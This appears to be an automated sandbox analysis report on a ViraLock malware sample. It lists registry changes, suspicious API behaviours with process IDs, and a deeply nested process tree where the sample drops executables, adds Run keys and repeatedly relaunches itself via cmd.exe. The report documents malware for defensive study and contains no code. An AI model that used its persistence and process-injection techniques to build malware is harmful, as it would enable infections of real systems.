Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 = 5600310000000000e958c886100057696e646f777300400009000400efbec5522d60ef5835532e000000a60500000000010000000000000000000000000000003d01af00570069006e0064006f0077007300000016000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\NodeSlot = "10"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "9"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	Process not Found

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
4212	reg.exe
968	reg.exe
3764	reg.exe
616	Process not Found
3448	Process not Found
2064	Process not Found
2752	reg.exe
2720	reg.exe
920	Process not Found
1012	Process not Found
4728	reg.exe
3188	reg.exe
3032	reg.exe
1140	reg.exe
3440	reg.exe
3856	reg.exe
3332	reg.exe
1080	reg.exe
1648	reg.exe
1076	reg.exe
3752	reg.exe
3464	Process not Found
2224	reg.exe
1184	reg.exe
2524	reg.exe
3188	reg.exe
2156	reg.exe
4760	reg.exe
4884	reg.exe
3032	reg.exe
3912	reg.exe
4732	reg.exe
1020	reg.exe
3800	reg.exe
4452	reg.exe
2524	reg.exe
3792	reg.exe
3916	reg.exe
3748	reg.exe
684	Process not Found
2164	Process not Found
2060	Process not Found
2168	reg.exe
3636	reg.exe
420	reg.exe
952	reg.exe
1040	reg.exe
4840	reg.exe
1672	reg.exe
2460	reg.exe
1236	Process not Found
1116	reg.exe
2316	reg.exe
2592	reg.exe
1324	Process not Found
2700	reg.exe
2472	reg.exe
4776	reg.exe
4380	reg.exe
4956	reg.exe
4476	reg.exe
1872	reg.exe
3188	Process not Found
2748	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3980	[email protected]
3980	[email protected]
3980	[email protected]
3980	[email protected]
1640	[email protected]
1640	[email protected]
1640	[email protected]
1640	[email protected]
1616	[email protected]
1616	[email protected]
1616	[email protected]
1616	[email protected]
4828	[email protected]
4828	[email protected]
4828	[email protected]
4828	[email protected]
3148	[email protected]
3148	[email protected]
3148	[email protected]
3148	[email protected]
1872	[email protected]
1872	[email protected]
1872	[email protected]
1872	[email protected]
2308	[email protected]
2308	[email protected]
2308	[email protected]
2308	[email protected]
2180	[email protected]
2180	[email protected]
2180	[email protected]
2180	[email protected]
3692	[email protected]
3692	[email protected]
3692	[email protected]
3692	[email protected]
3784	[email protected]
3784	[email protected]
3784	[email protected]
3784	[email protected]
3996	[email protected]
3996	[email protected]
3996	[email protected]
3996	[email protected]
4716	[email protected]
4716	[email protected]
4716	[email protected]
4716	[email protected]
4752	[email protected]
4752	[email protected]
4752	[email protected]
4752	[email protected]
2524	[email protected]
2524	[email protected]
2524	[email protected]
2524	[email protected]
1960	[email protected]
1960	[email protected]
1960	[email protected]
1960	[email protected]
4400	[email protected]
4400	[email protected]
4400	[email protected]
4400	[email protected]

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
4108	IuoMEsUc.exe
2724	Process not Found
2336	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	3008	Process not Found
Token: SeDebugPrivilege	2336	Process not Found
Token: SeSystemProfilePrivilege	2336	Process not Found
Token: SeCreateGlobalPrivilege	2336	Process not Found
Token: SeDebugPrivilege	1544	Process not Found
Token: SeDebugPrivilege	2740	Process not Found
Token: SeSecurityPrivilege	2336	Process not Found
Token: SeTakeOwnershipPrivilege	2336	Process not Found
Token: SeSecurityPrivilege	2336	Process not Found
Token: SeTakeOwnershipPrivilege	2336	Process not Found
Token: SeSecurityPrivilege	2336	Process not Found
Token: SeTakeOwnershipPrivilege	2336	Process not Found
Token: SeSecurityPrivilege	2336	Process not Found
Token: SeTakeOwnershipPrivilege	2336	Process not Found
Token: SeSecurityPrivilege	2336	Process not Found
Token: SeTakeOwnershipPrivilege	2336	Process not Found
Token: SeDebugPrivilege	1012	Process not Found
Token: SeDebugPrivilege	424	Process not Found
Token: SeDebugPrivilege	1900	Process not Found

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe
4108	IuoMEsUc.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found
2336	Process not Found

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
2724	Process not Found
2724	Process not Found
2724	Process not Found
2724	Process not Found
2724	Process not Found
2724	Process not Found
2724	Process not Found
2724	Process not Found
2724	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3980 wrote to memory of 4108	3980	[email protected]	79
PID 3980 wrote to memory of 4108	3980	[email protected]	79
PID 3980 wrote to memory of 4108	3980	[email protected]	79
PID 3980 wrote to memory of 3504	3980	[email protected]	80
PID 3980 wrote to memory of 3504	3980	[email protected]	80
PID 3980 wrote to memory of 3504	3980	[email protected]	80
PID 3980 wrote to memory of 2504	3980	[email protected]	81
PID 3980 wrote to memory of 2504	3980	[email protected]	81
PID 3980 wrote to memory of 2504	3980	[email protected]	81
PID 2504 wrote to memory of 1640	2504	cmd.exe	83
PID 2504 wrote to memory of 1640	2504	cmd.exe	83
PID 2504 wrote to memory of 1640	2504	cmd.exe	83
PID 3980 wrote to memory of 440	3980	[email protected]	84
PID 3980 wrote to memory of 440	3980	[email protected]	84
PID 3980 wrote to memory of 440	3980	[email protected]	84
PID 3980 wrote to memory of 3788	3980	[email protected]	85
PID 3980 wrote to memory of 3788	3980	[email protected]	85
PID 3980 wrote to memory of 3788	3980	[email protected]	85
PID 3980 wrote to memory of 1172	3980	[email protected]	86
PID 3980 wrote to memory of 1172	3980	[email protected]	86
PID 3980 wrote to memory of 1172	3980	[email protected]	86
PID 3980 wrote to memory of 408	3980	[email protected]	87
PID 3980 wrote to memory of 408	3980	[email protected]	87
PID 3980 wrote to memory of 408	3980	[email protected]	87
PID 408 wrote to memory of 5080	408	cmd.exe	92
PID 408 wrote to memory of 5080	408	cmd.exe	92
PID 408 wrote to memory of 5080	408	cmd.exe	92
PID 1640 wrote to memory of 4212	1640	[email protected]	93
PID 1640 wrote to memory of 4212	1640	[email protected]	93
PID 1640 wrote to memory of 4212	1640	[email protected]	93
PID 4212 wrote to memory of 1616	4212	cmd.exe	95
PID 4212 wrote to memory of 1616	4212	cmd.exe	95
PID 4212 wrote to memory of 1616	4212	cmd.exe	95
PID 1640 wrote to memory of 1028	1640	[email protected]	96
PID 1640 wrote to memory of 1028	1640	[email protected]	96
PID 1640 wrote to memory of 1028	1640	[email protected]	96
PID 1640 wrote to memory of 944	1640	[email protected]	97
PID 1640 wrote to memory of 944	1640	[email protected]	97
PID 1640 wrote to memory of 944	1640	[email protected]	97
PID 1640 wrote to memory of 2524	1640	[email protected]	98
PID 1640 wrote to memory of 2524	1640	[email protected]	98
PID 1640 wrote to memory of 2524	1640	[email protected]	98
PID 1640 wrote to memory of 2896	1640	[email protected]	99
PID 1640 wrote to memory of 2896	1640	[email protected]	99
PID 1640 wrote to memory of 2896	1640	[email protected]	99
PID 2896 wrote to memory of 1988	2896	cmd.exe	104
PID 2896 wrote to memory of 1988	2896	cmd.exe	104
PID 2896 wrote to memory of 1988	2896	cmd.exe	104
PID 1616 wrote to memory of 2876	1616	[email protected]	105
PID 1616 wrote to memory of 2876	1616	[email protected]	105
PID 1616 wrote to memory of 2876	1616	[email protected]	105
PID 2876 wrote to memory of 4828	2876	cmd.exe	107
PID 2876 wrote to memory of 4828	2876	cmd.exe	107
PID 2876 wrote to memory of 4828	2876	cmd.exe	107
PID 1616 wrote to memory of 2080	1616	[email protected]	108
PID 1616 wrote to memory of 2080	1616	[email protected]	108
PID 1616 wrote to memory of 2080	1616	[email protected]	108
PID 1616 wrote to memory of 1008	1616	[email protected]	109
PID 1616 wrote to memory of 1008	1616	[email protected]	109
PID 1616 wrote to memory of 1008	1616	[email protected]	109
PID 1616 wrote to memory of 2412	1616	[email protected]	110
PID 1616 wrote to memory of 2412	1616	[email protected]	110
PID 1616 wrote to memory of 2412	1616	[email protected]	110
PID 1616 wrote to memory of 3332	1616	[email protected]	111

C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3980
- C:\Users\Admin\AQwAIkAA\IuoMEsUc.exe
  "C:\Users\Admin\AQwAIkAA\IuoMEsUc.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:4108
- C:\ProgramData\FaYccgsU\QEgoQUMY.exe
  "C:\ProgramData\FaYccgsU\QEgoQUMY.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4212
    - - C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1616
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        8⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3148
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        10⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1872
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        12⤵
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        14⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        16⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        17⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        18⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        19⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        20⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        21⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3996
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        22⤵
        
        PID:72
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        23⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        24⤵
        
        PID:1012
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        25⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        26⤵
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        28⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        29⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1960
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        30⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        31⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        32⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        33⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        34⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        35⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        36⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        37⤵
        
        PID:3400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        38⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        39⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        40⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        41⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        42⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        43⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        44⤵
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock
        45⤵
        
        PID:3524
        
